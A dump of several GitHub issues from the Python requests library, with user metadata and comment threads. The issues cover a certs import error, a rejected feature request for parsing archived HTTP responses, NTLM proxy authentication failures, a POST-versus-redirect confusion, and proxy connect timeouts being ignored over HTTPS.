I'm having this error for the last 2 days. It seems a problem with python requests library, but I've re-installed it several times with no luck. ``` Traceback (most recent call last): File "project-src/bla-blah/manage.py", line 10, in <module> execute_from_command_line(sys.argv) File "project-src\env\lib\site-packages\django\core\management\__init__.py", line 385, in execute_from_command_line utility.execute() File "project-src\env\lib\site-packages\django\core\management\__init__.py", line 354, in execute django.setup() File "project-src\env\lib\site-packages\django\__init__.py", line 21, in setup apps.populate(settings.INSTALLED_APPS) File "project-src\env\lib\site-packages\django\apps\registry.py", line 85, in populate app_config = AppConfig.create(entry) File "project-src\env\lib\site-packages\django\apps\config.py", line 112, in create mod = import_module(mod_path) File "C:\Python34\lib\importlib\__init__.py", line 109, in import_module return _bootstrap._gcd_import(name[level:], package, level) File "<frozen importlib._bootstrap>", line 2254, in _gcd_import File "<frozen importlib._bootstrap>", line 2237, in _find_and_load File "<frozen importlib._bootstrap>", line 2226, in _find_and_load_unlocked File "<frozen importlib._bootstrap>", line 1200, in _load_unlocked File "<frozen importlib._bootstrap>", line 1129, in _exec File "<frozen importlib._bootstrap>", line 1471, in exec_module File "<frozen importlib._bootstrap>", line 321, in _call_with_frames_removed File "project-src\env\lib\site-packages\social\apps\django_app\__init__.py", line 14, in <module> from social.apps.django_app.utils import load_strategy File "project-src\env\lib\site-packages\social\apps\django_app\utils.py", line 12, in <module> from social.backends.utils import get_backend File "project-src\env\lib\site-packages\social\backends\utils.py", line 2, in <module> from social.backends.base import BaseAuth File "project-src\env\lib\site-packages\social\backends\base.py", line 1, in <module> from requests import request, ConnectionError File "project-src\env\lib\site-packages\requests\__init__.py", line 58, in <module> from . import utils File "project-src\env\lib\site-packages\requests\utils.py", line 24, in <module> from . import certs ImportError: cannot import name 'certs' ``` Maybe it's a problem with Windows 7 update from 2 days ago, because is the only thing that has changed in the last few days. By the way, I'm using python 3.4 with virtualenv, PyCharm 3.4.1 IDE and Win7. Inside **certs.py** there is the code that has the problem (last line): ``` try: from certifi import where except ImportError: def where(): """Return the preferred certificate bundle.""" # vendored bundle inside Requests return os.path.join(os.path.dirname(__file__), 'cacert.pem') ``` Any ideas?
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2340/reactions" }
https://api.github.com/repos/psf/requests/issues/2340/timeline
null
completed
null
null
false
[ "As discussed on your [StackOverflow question](https://stackoverflow.com/questions/26928672/importerror-cannot-import-name-certs?noredirect=1#comment42433284_26928672), we concluded this is not a bug. Thanks @davyria \n", "It happens to me exactly the same after installing the latest Windows update. It is the only library of all installed which fails. Could it be using a native operating system resource? In OSX, GNU/Linux and Windows (without upgrading) works perfectly, so I think it's an issue of the lib in the new environment.\n", "@blazaid it sounds more like an issue with the environment to me. Without a Windows VM to test with I can't provide much help. Your best bet is to describe the series of events that led to your broken installation and posting to StackOverflow with more detail than @davyria \n" ]
https://api.github.com/repos/psf/requests/issues/2339
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2339/labels{/name}
https://api.github.com/repos/psf/requests/issues/2339/comments
https://api.github.com/repos/psf/requests/issues/2339/events
https://github.com/psf/requests/issues/2339
48,704,429
MDU6SXNzdWU0ODcwNDQyOQ==
2,339
Create a response object from archived string or file HTTP responses.
{ "avatar_url": "https://avatars.githubusercontent.com/u/1725327?v=4", "events_url": "https://api.github.com/users/recrm/events{/privacy}", "followers_url": "https://api.github.com/users/recrm/followers", "following_url": "https://api.github.com/users/recrm/following{/other_user}", "gists_url": "https://api.github.com/users/recrm/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/recrm", "id": 1725327, "login": "recrm", "node_id": "MDQ6VXNlcjE3MjUzMjc=", "organizations_url": "https://api.github.com/users/recrm/orgs", "received_events_url": "https://api.github.com/users/recrm/received_events", "repos_url": "https://api.github.com/users/recrm/repos", "site_admin": false, "starred_url": "https://api.github.com/users/recrm/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/recrm/subscriptions", "type": "User", "url": "https://api.github.com/users/recrm", "user_view_type": "public" }
[ { "color": "02e10c", "default": false, "description": null, "id": 76800, "name": "Feature Request", "node_id": "MDU6TGFiZWw3NjgwMA==", "url": "https://api.github.com/repos/psf/requests/labels/Feature%20Request" } ]
closed
true
null
[]
null
3
2014-11-13T22:56:56Z
2021-09-08T23:06:59Z
2014-11-14T14:20:49Z
NONE
resolved
So I'm working with warc files. Warc files are a storage medium for saving and archiving websites, so they contain plenty (possibly thousands) of text HTTP request / response pairs. I need a way to parse these responses into usable objects. Extracting the text of the HTTP response from the warc file is easy enough, but I can't find a decent python library that will convert that response text into a response object. About the best I can find is this: http://stackoverflow.com/questions/24728088/python-parse-http-response-string which requires me to set up fake server connections using a really ugly library. As a work around it kinda works, but it would be nice to work with something a bit more human. In my field the internet archive is growing in importance and I can see this issue coming up for more people than just me. It would be a nice feature to have.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2339/reactions" }
https://api.github.com/repos/psf/requests/issues/2339/timeline
null
completed
null
null
false
[ "This feature really belongs in another library altogether. The problem is that the HTTP parsing logic in requests is in `httplib`, which is well down our stack and outside our control. This means we can't pull it out into common code.\n\n_However_, @dstufft has been working on a formal HTTP parsing library which might be usable as a base for this use-case. What do you think, @dstufft?\n", "Uh, yea you can parse that with my http11 lib, but it has no docs currently and would require some assembly right now I think. In particular I don't think it actually parses bodies currently.\n", "I agree. This belongs in another library. If that library chooses to interact with requests that'd be great and they could probably take a similar approach to [betamax](/sigmavirus24/betamax). I'm happy to advise, but this isn't a bug and it's at this point a rejected feature.\n\nThanks @recrm for starting this discussion.\n" ]
https://api.github.com/repos/psf/requests/issues/2338
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2338/labels{/name}
https://api.github.com/repos/psf/requests/issues/2338/comments
https://api.github.com/repos/psf/requests/issues/2338/events
https://github.com/psf/requests/issues/2338
48,663,828
MDU6SXNzdWU0ODY2MzgyOA==
2,338
Proxy not working
{ "avatar_url": "https://avatars.githubusercontent.com/u/9723897?v=4", "events_url": "https://api.github.com/users/dmorri/events{/privacy}", "followers_url": "https://api.github.com/users/dmorri/followers", "following_url": "https://api.github.com/users/dmorri/following{/other_user}", "gists_url": "https://api.github.com/users/dmorri/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/dmorri", "id": 9723897, "login": "dmorri", "node_id": "MDQ6VXNlcjk3MjM4OTc=", "organizations_url": "https://api.github.com/users/dmorri/orgs", "received_events_url": "https://api.github.com/users/dmorri/received_events", "repos_url": "https://api.github.com/users/dmorri/repos", "site_admin": false, "starred_url": "https://api.github.com/users/dmorri/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/dmorri/subscriptions", "type": "User", "url": "https://api.github.com/users/dmorri", "user_view_type": "public" }
[]
closed
true
null
[]
null
45
2014-11-13T17:13:41Z
2021-09-05T00:06:57Z
2014-11-17T08:48:58Z
NONE
resolved
This code will work on my personal laptop, but then when I move to a windows server where we have to use a proxy to access the outside world, I get a 407 error. I added the proxies to this (just like I have setup in my Internet explorer settings that work). Any ideas? import requests proxies = { "http": "10.51.1.140:8080", "https": "10.51.1.140:8080", } r = requests.get('https://epfws.usps.gov/ws/resources/epf/version', proxies=proxies) print(r.text) Here is what I get: G:\Python34>python uspsver.py Traceback (most recent call last): File "G:\Python34\lib\site-packages\requests-2.4.3-py3.4.egg\requests\packages \urllib3\connectionpool.py", line 511, in urlopen conn = self._get_conn(timeout=pool_timeout) File "G:\Python34\lib\site-packages\requests-2.4.3-py3.4.egg\requests\packages \urllib3\connectionpool.py", line 231, in _get_conn return conn or self._new_conn() File "G:\Python34\lib\site-packages\requests-2.4.3-py3.4.egg\requests\packages \urllib3\connectionpool.py", line 712, in _new_conn return self._prepare_conn(conn) File "G:\Python34\lib\site-packages\requests-2.4.3-py3.4.egg\requests\packages \urllib3\connectionpool.py", line 685, in _prepare_conn conn.connect() File "G:\Python34\lib\site-packages\requests-2.4.3-py3.4.egg\requests\packages \urllib3\connection.py", line 208, in connect self._tunnel() File "G:\Python34\lib\http\client.py", line 822, in _tunnel message.strip())) OSError: Tunnel connection failed: 407 Proxy Authentication Required During handling of the above exception, another exception occurred: Traceback (most recent call last): File "G:\Python34\lib\site-packages\requests-2.4.3-py3.4.egg\requests\adapters .py", line 364, in send timeout=timeout File "G:\Python34\lib\site-packages\requests-2.4.3-py3.4.egg\requests\packages \urllib3\connectionpool.py", line 559, in urlopen _pool=self, _stacktrace=stacktrace) File "G:\Python34\lib\site-packages\requests-2.4.3-py3.4.egg\requests\packages \urllib3\util\retry.py", line 265, in increment raise 
MaxRetryError(_pool, url, error) requests.packages.urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='ep fws.usps.gov', port=443): Max retries exceeded with url: /ws/resources/epf/versi on (Caused by ProxyError('Cannot connect to proxy.', OSError('Tunnel connection failed: 407 Proxy Authentication Required',))) During handling of the above exception, another exception occurred: Traceback (most recent call last): File "uspsver.py", line 5, in <module> r = requests.get('https://epfws.usps.gov/ws/resources/epf/version', proxies= proxies) File "G:\Python34\lib\site-packages\requests-2.4.3-py3.4.egg\requests\api.py", line 65, in get return request('get', url, *_kwargs) File "G:\Python34\lib\site-packages\requests-2.4.3-py3.4.egg\requests\api.py", line 49, in request response = session.request(method=method, url=url, *_kwargs) File "G:\Python34\lib\site-packages\requests-2.4.3-py3.4.egg\requests\sessions .py", line 459, in request resp = self.send(prep, *_send_kwargs) File "G:\Python34\lib\site-packages\requests-2.4.3-py3.4.egg\requests\sessions .py", line 571, in send r = adapter.send(request, *_kwargs) File "G:\Python34\lib\site-packages\requests-2.4.3-py3.4.egg\requests\adapters .py", line 415, in send raise ConnectionError(e, request=request) requests.exceptions.ConnectionError: HTTPSConnectionPool(host='epfws.usps.gov', port=443): Max retries exceeded with url: /ws/resources/epf/version (Caused by P roxyError('Cannot connect to proxy.', OSError('Tunnel connection failed: 407 Pro xy Authentication Required',))) G:\Python34>
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2338/reactions" }
https://api.github.com/repos/psf/requests/issues/2338/timeline
null
completed
null
null
false
[ "The error here is extremely clear: _407 Proxy Authentication Required_.\n\nYou need to send some user credentials to the proxy. The real risk here is that the proxy is a Windows domain auth proxy, in which case this will be extremely difficult.\n", "Yep. Clear. But here is the deal. I do NOT have to send in any credentials when using via my internet browser. I will try with user and password and see what it does...I really don't want to have to do that though. \n", "I'm not surprised. That's because you'll be doing some form of domain auth: maybe NTLM, maybe Kerberos. Either way it is extremely difficult to authenticate with a proxy that requires this kind of auth from Python, and to my knowledge there is no project that does so with requests.\n", "So would trying with user:password actually work? If so what user/password would it need. Using my credentials does not work.\n", "Let's be clear about what you're authenticating to.\n\nIf you pass `auth=(user,pass)` that will not work. That attempts to authenticate with the remote server, not the proxy. You'd need to set a Proxy-Authorization header. You can try doing that by setting your proxy URL to `http://user:pass@proxy_ip/`. That _might_ work.\n", "Yep..That is what I just tried. See below. Didn't work if I set it up right. Still get 407 error.\n\nimport requests\nproxies = {\n \"http\": \"'dmorri':'@XYZ@12345'@proxy.shareddev.acxiom.net:8080\",\n \"https\": \"'dmorri':'@XYZ@12345'@proxy.shareddev.acxiom.net:8080\",\n}\nr = requests.get('https://epfws.usps.gov/ws/resources/epf/version', proxies=proxies)\nprint(r.text)\n", "Uh...why are there quotes in your username and password?\n", "Well my password has @ symbols. :-) So figured I had to put single quotes around it. I can try without. :-)\n", "I think you'll have to try without, but it does raise the question about how well the parsing is going to work here. 
I wonder what we did last time.\n", "So here is what I get without.\n\n\\urllib3\\poolmanager.py\", line 265, in proxy_from_ur\n return ProxyManager(proxy_url=url, **kw)\n File \"G:\\Python34\\lib\\site-packages\\requests-2.4.3\n\\urllib3\\poolmanager.py\", line 216, in **init**\n 'Not supported proxy scheme %s' % proxy.scheme\nAssertionError: Not supported proxy scheme dmorri\n", "You left the scheme off the proxy URL. Must begin http://\n", "Same error:\n\nimport requests\nproxies = {\n \"http\": \"dmorri:@XYZ@12345@http://proxy.shareddev.acxiom.net:8080\",\n \"https\": \"dmorri:@XYZ@12345@http://proxy.shareddev.acxiom.net:8080\",\n}\nr = requests.get('https://epfws.usps.gov/ws/resources/epf/version', proxies=proxies)\nprint(r.text)\n", "Error again is: \n\nG:\\Python34>python uspsver.py\nTraceback (most recent call last):\n File \"uspsver.py\", line 6, in <module>\n r = requests.get('https://epfws.usps.gov/ws/resources/epf/version', proxies=\nproxies)\n File \"G:\\Python34\\lib\\site-packages\\requests-2.4.3-py3.4.egg\\requests\\api.py\",\n line 65, in get\n return request('get', url, *_kwargs)\n File \"G:\\Python34\\lib\\site-packages\\requests-2.4.3-py3.4.egg\\requests\\api.py\",\n line 49, in request\n response = session.request(method=method, url=url, *_kwargs)\n File \"G:\\Python34\\lib\\site-packages\\requests-2.4.3-py3.4.egg\\requests\\sessions\n.py\", line 459, in request\n resp = self.send(prep, *_send_kwargs)\n File \"G:\\Python34\\lib\\site-packages\\requests-2.4.3-py3.4.egg\\requests\\sessions\n.py\", line 571, in send\n r = adapter.send(request, *_kwargs)\n File \"G:\\Python34\\lib\\site-packages\\requests-2.4.3-py3.4.egg\\requests\\adapters\n.py\", line 331, in send\n conn = self.get_connection(request.url, proxies)\n File \"G:\\Python34\\lib\\site-packages\\requests-2.4.3-py3.4.egg\\requests\\adapters\n.py\", line 239, in get_connection\n proxy_manager = self.proxy_manager_for(proxy)\n File 
\"G:\\Python34\\lib\\site-packages\\requests-2.4.3-py3.4.egg\\requests\\adapters\n.py\", line 149, in proxy_manager_for\n *_proxy_kwargs)\n File \"G:\\Python34\\lib\\site-packages\\requests-2.4.3-py3.4.egg\\requests\\packages\n\\urllib3\\poolmanager.py\", line 265, in proxy_from_url\n return ProxyManager(proxy_url=url, *_kw)\n File \"G:\\Python34\\lib\\site-packages\\requests-2.4.3-py3.4.egg\\requests\\packages\n\\urllib3\\poolmanager.py\", line 216, in **init**\n 'Not supported proxy scheme %s' % proxy.scheme\nAssertionError: Not supported proxy scheme dmorri\n\nG:\\Python34>\n", "Heh, let's be really clear and reprint what I said above:\n\n```\nhttp://user:pass@proxy_ip/\n```\n\nThe scheme must come before the username and password.\n", "Oops. My bad.\n", "Now I get the 407 error again. \n", "import requests\nproxies = {\n \"http\": \"http://dmorri:@XYZ@[email protected]:8080\",\n \"https\": \"http://dmorri:@XYZ@[email protected]:8080\",\n}\nr = requests.get('https://epfws.usps.gov/ws/resources/epf/version', proxies=proxies)\nprint(r.text)\n", "Yup, so that suggests that the procedure doesn't work.\n\nThis almost certainly uses NTLM or Kerberos to authenticate. 
Quick question, does it happen with HTTP as well as HTTPS?\n", "are you prepending an @ to your password?\n\n## \n\nKevin Burke\nphone: 925.271.7005 | twentymilliseconds.com\n\nOn Thu, Nov 13, 2014 at 9:52 AM, dmorri [email protected] wrote:\n\n> import requests\n> proxies = {\n> \"http\": \"http://dmorri:@XYZ https://github.com/XYZ@\n> [email protected]:8080\",\n> \"https\": \"http://dmorri:@XYZ https://github.com/XYZ@\n> [email protected]:8080\",\n> }\n> r = requests.get('https://epfws.usps.gov/ws/resources/epf/version',\n> proxies=proxies)\n> print(r.text)\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2338#issuecomment-62935509\n> .\n", "Not sure...Do you have a HTTP get call I can try?\n", "Try calling `http://httpbin.org/get`.\n", "Here is what I get on the httpbin.org.\n\nG:\\Python34>python uspsver.py\n<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\"http://www.w3.org/TR/html4/loose.dtd\">\n<html>\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">\n<title>Notification: Proxy Authorization Required</title>\n\n<style type=\"text/css\">\n<!--\nbody {\n margin-left: 2%;\n margin-right: 2%;\n}\np {\n font-family: verdana, Arial, Helvetica, sans-serif;\n font-size: 12px;\n top: 0px;\n margin-top: 6px;\n margin-bottom: 6px;\n}\ntd {\n font-family: verdana, Arial, Helvetica, sans-serif;\n font-size: 12px;\n top: 0px;\n}\n.code {\n font-family: courier;\n font-size: 12px;\n top: 0px;\n}\nh1 {\n font-family: verdana, Arial, Helvetica, sans-serif;\n font-size: 16px;\n margin-top: 24px;\n margin-bottom: 8px;\n}\nhr {\n margin-top: 2px;\n margin-bottom: 2px;\n}\n-->\n</style>\n\n</head>\n\n<body>\n<img src=\"http://acxpac01.corp.acxiom.net/error/ACXM.gif\" border=\"0\">\n\n<h1>This Page Cannot Be Displayed</h1>\n\n<hr>\n\n<p>\nAuthentication is required to access the Internet using this system.\nA valid user ID and password must be entered when 
prompted.\n</p>\n\n<p>If you feel you have reached this page in error and want to have the site rev\niewed, please open a LevelZero request ticket at the <a href=\"http://levelzero/l\nevelzero/\">LevelZero Site</a> for the ESOC team. <b>* Message reported from cwy\nipwsa1 *</b></p>\n<p>\nIf you have questions, need assistance with your login\ninformation, or feel this is an error, please contact\nESOC via a LevelZero ticket\nand provide the codes shown below.\n</p>\n\n<hr>\n\n<table>\n <tr valign=\"top\">\n <td valign=\"top\" width=\"10%\">Notification&nbsp;codes:&nbsp;</td>\n <td valign=\"top\" class=\"code\" width=\"90%\">(1, PROXY_AUTH_REQUIRED)</td>\n </tr>\n</table>\n\n</body>\n</html>\n\nG:\\Python34>\n", "Right, that's what I expected. Do you know how to use tcpdump or wireshark?\n", "So slightly different, but same type of issue. \n\nKevin..What do you mean by pre-appending? The password has two @ symbols. as shown...I just changed to XYZ since I didn't want to post my actual pasword. But the layout is still the same. \n@xxx@11111\n", "I did some dumps with wireshark long ago!!! \n", "Oh, wait, we don't need it.\n\nDon't print the response, print the response headers for me please.\n", "okay..Hold on.\n", "Sup! You rang?\n", "With the http call I can print it (With https with 407 I cannot). \n\nG:\\Python34>python uspsver.py\n{'Content-Length': '1753', 'Proxy-Authenticate': 'NTLM', 'Connection': 'close',\n'Content-Type': 'text/html', 'Proxy-Connection': 'close', 'Mime-Version': '1.0',\n 'Date': 'Thu, 13 Nov 2014 12:09:08 CST'}\n", "@xxx Oh, that's gotta be the most annoying handle on GitHub. Sorry you got accidentally summoned!\n" ]
https://api.github.com/repos/psf/requests/issues/2337
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2337/labels{/name}
https://api.github.com/repos/psf/requests/issues/2337/comments
https://api.github.com/repos/psf/requests/issues/2337/events
https://github.com/psf/requests/issues/2337
48,650,926
MDU6SXNzdWU0ODY1MDkyNg==
2,337
[MISTAKE] POST requests are executed like GET
{ "avatar_url": "https://avatars.githubusercontent.com/u/10137?v=4", "events_url": "https://api.github.com/users/ghost/events{/privacy}", "followers_url": "https://api.github.com/users/ghost/followers", "following_url": "https://api.github.com/users/ghost/following{/other_user}", "gists_url": "https://api.github.com/users/ghost/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/ghost", "id": 10137, "login": "ghost", "node_id": "MDQ6VXNlcjEwMTM3", "organizations_url": "https://api.github.com/users/ghost/orgs", "received_events_url": "https://api.github.com/users/ghost/received_events", "repos_url": "https://api.github.com/users/ghost/repos", "site_admin": false, "starred_url": "https://api.github.com/users/ghost/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/ghost/subscriptions", "type": "User", "url": "https://api.github.com/users/ghost", "user_view_type": "public" }
[]
closed
true
null
[]
null
4
2014-11-13T15:44:01Z
2021-09-08T23:06:52Z
2014-11-13T18:51:18Z
NONE
resolved
Hi, Seems like always POST requests are executed as GET. All examples that I found seems to match my way of using `requests.post()`, but still no POST request is executed. My `requests` version is '2.2.1', my python version is `2.7.6` Here is code snippet: ----------------------- Python code start ---------------------------- import requests import json url = 'http://api.website.com' auth = ('user', 'pass') headers = {'Content-Type' : 'application/json'} proxies = {"http" : "http://address:port", "https" : "http:/address:port"} data = json.dumps({'1' : 2, 'a' : 'b'}) response = requests.post(url=url, data=data, headers=headers, auth=auth, proxies=proxies) print response.headers print response.text ----------------------- Python code end ---------------------------- I hope it is not implementation issue. Thanks
null
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2337/reactions" }
https://api.github.com/repos/psf/requests/issues/2337/timeline
null
completed
null
null
false
[ "What does 'executed as a GET' mean?\n\nA POST request is signaled by sending a request line that looks like this:\n\n```\nPOST / HTTP/1.1\n```\n\nWe're definitely doing that correctly. You're going to have to be more specific about what you think is wrong.\n", "I suspect you're being redirected. Try passing `allow_redirects=False` and see what the response is that you get. That said, my suspicion is rooted in nothing other than the expected behaviour of clients following the HTTP RFCs. We need a lot more information about what `response.history` looks like and what server you're talking to.\n", "This has nothing to do with requests and everything to do with your PHP. See [this Stack Overflow question](https://stackoverflow.com/questions/18866571/receive-json-post-with-php).\n", "That's not a problem, I'm glad we could help. =)\n" ]
https://api.github.com/repos/psf/requests/issues/2336
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2336/labels{/name}
https://api.github.com/repos/psf/requests/issues/2336/comments
https://api.github.com/repos/psf/requests/issues/2336/events
https://github.com/psf/requests/issues/2336
48,629,128
MDU6SXNzdWU0ODYyOTEyOA==
2,336
Timeout for connecting to proxy
{ "avatar_url": "https://avatars.githubusercontent.com/u/716339?v=4", "events_url": "https://api.github.com/users/glaslos/events{/privacy}", "followers_url": "https://api.github.com/users/glaslos/followers", "following_url": "https://api.github.com/users/glaslos/following{/other_user}", "gists_url": "https://api.github.com/users/glaslos/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/glaslos", "id": 716339, "login": "glaslos", "node_id": "MDQ6VXNlcjcxNjMzOQ==", "organizations_url": "https://api.github.com/users/glaslos/orgs", "received_events_url": "https://api.github.com/users/glaslos/received_events", "repos_url": "https://api.github.com/users/glaslos/repos", "site_admin": false, "starred_url": "https://api.github.com/users/glaslos/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/glaslos/subscriptions", "type": "User", "url": "https://api.github.com/users/glaslos", "user_view_type": "public" }
[ { "color": "e10c02", "default": false, "description": null, "id": 117744, "name": "Bug", "node_id": "MDU6TGFiZWwxMTc3NDQ=", "url": "https://api.github.com/repos/psf/requests/labels/Bug" } ]
closed
true
null
[]
null
38
2014-11-13T12:10:06Z
2021-09-08T17:05:23Z
2015-03-02T09:49:24Z
NONE
resolved
I provided a bogus proxy, set a very short timeout and expected requests to fail very fast. Unfortunately the opposite happened. Is this behavior intentional? As far as I can tell there is no way to set a timeout for the proxy connection. ``` Python time python -c "import requests; print requests.__version__; requests.get('https://google.com', timeout=0.01, proxies={'https':'https://1.1.1.1'})" 2.4.3 Traceback (most recent call last): File "<string>", line 1, in <module> File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 60, in get return request('get', url, **kwargs) File "/usr/local/lib/python2.7/dist-packages/requests/api.py", line 49, in request return session.request(method=method, url=url, **kwargs) File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 457, in request resp = self.send(prep, **send_kwargs) File "/usr/local/lib/python2.7/dist-packages/requests/sessions.py", line 569, in send r = adapter.send(request, **kwargs) File "/usr/local/lib/python2.7/dist-packages/requests/adapters.py", line 413, in send raise ConnectionError(e, request=request) requests.exceptions.ConnectionError: HTTPSConnectionPool(host='google.com', port=443): Max retries exceeded with url: / (Caused by ProxyError('Cannot connect to proxy.', error(110, 'Connection timed out'))) real 2m7.350s user 0m0.090s sys 0m0.030s ```
{ "avatar_url": "https://avatars.githubusercontent.com/u/716339?v=4", "events_url": "https://api.github.com/users/glaslos/events{/privacy}", "followers_url": "https://api.github.com/users/glaslos/followers", "following_url": "https://api.github.com/users/glaslos/following{/other_user}", "gists_url": "https://api.github.com/users/glaslos/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/glaslos", "id": 716339, "login": "glaslos", "node_id": "MDQ6VXNlcjcxNjMzOQ==", "organizations_url": "https://api.github.com/users/glaslos/orgs", "received_events_url": "https://api.github.com/users/glaslos/received_events", "repos_url": "https://api.github.com/users/glaslos/repos", "site_admin": false, "starred_url": "https://api.github.com/users/glaslos/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/glaslos/subscriptions", "type": "User", "url": "https://api.github.com/users/glaslos", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2336/reactions" }
https://api.github.com/repos/psf/requests/issues/2336/timeline
null
completed
null
null
false
[ "That's an interesting question. @kevinburke, got any idea?\n", "A guess without looking at anything is that the ProxyManager doesn't apply the timeout to connections to the proxy.\n", "Will take a look when I get an computer\n\nOn Thursday, November 13, 2014, Ian Cordasco [email protected]\nwrote:\n\n> A guess without looking at anything is that the ProxyManager doesn't apply\n> the timeout to connections to the proxy.\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2336#issuecomment-62920205\n> .\n\n## \n\n## \n\nKevin Burke\nphone: 925.271.7005 | twentymilliseconds.com\n", "Hmmm seems to time out right away if you make the request over HTTP. here is my investigation so far.\n\nhttps://gist.github.com/kevinburke/e862b5d6a56a6d99de9d\n\nAbout to start reading code.\n", "So... this is an error. \n\nThe gist of it is, with HTTPS connections connect() gets called earlier in the urlopen() process than with a HTTP connection. Specifically, for HTTPS _new_conn will call _prepare_conn, which calls connect() on the socket, where for HTTP, the connect() call is delayed all the way until httplib.request.\n\nurllib3 sets the connection timeout until after calling _get_conn, but before httplib.request, which explains why the timeout isn't set.\n\nThe obvious question is why isn't this an issue when you're not using a proxy? Well, prepare_conn only attempts the connect() if you're using a proxy, with the following note:\n\n```\n # Establish tunnel connection early, because otherwise httplib\n # would improperly set Host: header to proxy's IP:port.\n conn.connect()\n```\n\nI'll discuss with @shazow and see if we can figure out a good course of action.\n", "Added https://github.com/shazow/urllib3/issues/504. 
